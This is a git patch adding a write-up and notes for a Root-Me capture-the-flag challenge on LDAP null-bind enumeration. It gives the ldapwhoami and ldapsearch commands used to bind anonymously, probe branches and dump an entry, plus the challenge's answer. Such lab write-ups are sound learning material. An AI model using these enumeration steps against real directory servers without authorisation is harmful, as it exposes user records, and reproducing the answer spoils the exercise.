From de25173927f8eb394dd6b07def3fca5b271ff0a5 Mon Sep 17 00:00:00 2001
From: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
Date: Sat, 21 Mar 2026 13:54:37 +0100
Subject: [PATCH] feat ldap-null-bind

Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
---
 network/lda-null-bind/explaination.org | 81 ++++++++++++++++++++++++++
 network/lda-null-bind/notes.org        | 61 +++++++++++++++++++
 2 files changed, 142 insertions(+)
 create mode 100644 network/lda-null-bind/explaination.org
 create mode 100644 network/lda-null-bind/notes.org

diff --git a/network/lda-null-bind/explaination.org b/network/lda-null-bind/explaination.org
new file mode 100644
index 0000000..8d19f4a
--- /dev/null
+++ b/network/lda-null-bind/explaination.org
@@ -0,0 +1,81 @@
+* LDAP null-bind challenge explained simply
+
+Think of LDAP like a big company phonebook/tree.
+
+Each node in the tree is a folder or a person record:
+
+#+begin_example
+dc=challenge01,dc=root-me,dc=org
+|
++-- ou=anonymous
+    |
+    +-- uid=sabu
+        +-- mail: sabu@anonops.org
+#+end_example
+
+In this challenge, the server allows *anonymous login* (called a null bind).
+That means we can connect without a username/password and ask some questions.
+
+** What we did (step by step)
+
+1) Checked if anonymous access works
+
+#+begin_src bash
+ldapwhoami -x -H ldap://challenge01.root-me.org:54013
+#+end_src
+
+It returned `anonymous`, so null bind is enabled.
+
+2) Tried to list everything from the main base DN
+
+#+begin_src bash
+ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
+#+end_src
+
+Server replied with `Insufficient access`.
+
+So: anonymous is allowed, but not everywhere.
+
+3) Probed likely child branches under the base DN
+
+We tested candidate DNs and found one readable branch:
+
+#+begin_src bash
+ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
+#+end_src
+
+That confirmed `ou=anonymous` exists and is accessible.
+
+4) Enumerated that readable branch
+
+#+begin_src bash
+ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
+#+end_src
+
+This returned a user record:
+
+- `uid=sabu`
+- `mail: sabu@anonops.org`
+
+So the requested email is:
+
+*sabu@anonops.org*
+
+** Why this works
+
+- LDAP permissions are often set per branch (subtree).
+- Root/base queries may be blocked.
+- A specific subtree can still be world-readable.
+- Enumeration is about finding *where* read access is allowed.
+
+** Tiny mental model
+
+#+begin_example
+[Connect anonymously] --> [Test base DN] --blocked--> [Try child branches]
+                                           |
+                                           v
+                               [Find readable subtree]
+                                           |
+                                           v
+                                [Dump entries + get mail]
+#+end_example
diff --git a/network/lda-null-bind/notes.org b/network/lda-null-bind/notes.org
new file mode 100644
index 0000000..671f768
--- /dev/null
+++ b/network/lda-null-bind/notes.org
@@ -0,0 +1,61 @@
+* LDAP - null bind
+** Notes
+- https://repository.root-me.org/RFC/EN%20-%20rfc4512.txt
+- https://stackoverflow.com/questions/18756688/what-are-cn-ou-dc-in-an-ldap-search
+** Task
+Aufgabe
+
+Es scheint, dass einer der Anonymen einen neuen Zweig im LDAP-Verzeichnis erstellt hat, irgendwo in :
+dc=challenge01,dc=root-me,dc=org
+
+Verschaffen Sie sich Zugang zu seinen Daten und erhalten Sie seine E-Mail-Adresse.
+Zugangsdaten für die Übung
+Host	challenge01.root-me.org
+Protokoll	TCP
+Port	54013
+
+** Findings
+- Challenge type: LDAP anonymous/null bind enumeration.
+- Base DN: dc=challenge01,dc=root-me,dc=org
+- Target: find the branch created by an anonymous user and extract their email address.
+
+** Useful tools
+- ldapsearch (required)
+- ldapwhoami (quick null-bind check)
+- openssl s_client (optional, for TLS troubleshooting)
+
+** Recon commands
+#+begin_src bash
+ldapwhoami -x -H ldap://challenge01.root-me.org:54013
+ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
+ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"
+#+end_src
+
+** Execution log
+- Verified anonymous bind:
+  #+begin_src bash
+  ldapwhoami -x -H ldap://challenge01.root-me.org:54013
+  # anonymous
+  #+end_src
+
+- Direct subtree query on base DN is blocked:
+  #+begin_src bash
+  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
+  # result: 50 Insufficient access
+  #+end_src
+
+- Enumerated likely child DNs and found readable branch:
+  #+begin_src bash
+  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
+  # dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
+  #+end_src
+
+- Dumped subtree under readable branch:
+  #+begin_src bash
+  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
+  # dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
+  # mail: sabu@anonops.org
+  #+end_src
+
+** Flag / answer
+- Email address: sabu@anonops.org